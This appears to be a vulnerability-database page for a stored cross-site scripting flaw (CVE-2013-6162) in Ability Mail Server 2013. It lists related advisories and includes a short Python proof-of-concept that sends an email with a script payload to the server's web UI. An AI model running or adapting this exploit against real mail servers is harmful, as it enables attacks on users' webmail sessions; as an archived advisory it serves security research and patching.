Lucene search
K

Ability-Mail-Server-2013

🗓️ 04 Jan 2015 17:21:13Reported by David UmType 
exploitpack
 exploitpack
👁 13 Views

Sending malicious email through SMTP serve

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Ability Mail Server 2013 (3.1.1) - Stored XSS Vulnerability
17 Dec 201300:00
zdt
Circl
CVE-2013-6162
17 Dec 201300:00
circl
CVE
CVE-2013-6162
21 Dec 201300:00
cve
Cvelist
CVE-2013-6162
21 Dec 201300:00
cvelist
Exploit DB
Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting
17 Dec 201300:00
exploitdb
EUVD
EUVD-2013-5991
7 Oct 202500:30
euvd
exploitpack
Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting
17 Dec 201300:00
exploitpack
NVD
CVE-2013-6162
21 Dec 201300:55
nvd
Prion
Cross site scripting
21 Dec 201300:55
prion
seebug.org
Ability Mail Server 2013 (3.1.1) 存储型跨站脚本漏洞
18 Dec 201300:00
seebug
Rows per page
import smtplib
 
email_addr = '[email protected]'
 
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email += '<script>alert("XSS")</script>'
s = smtplib.SMTP('192.168.58.140', 25)
 
s.login(email_addr, "user")
s.sendmail(email_addr, email_addr, email)
s.quit()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jan 2015 17:21Current
0.5Low risk
Vulners AI Score0.5
EPSS0.00519
13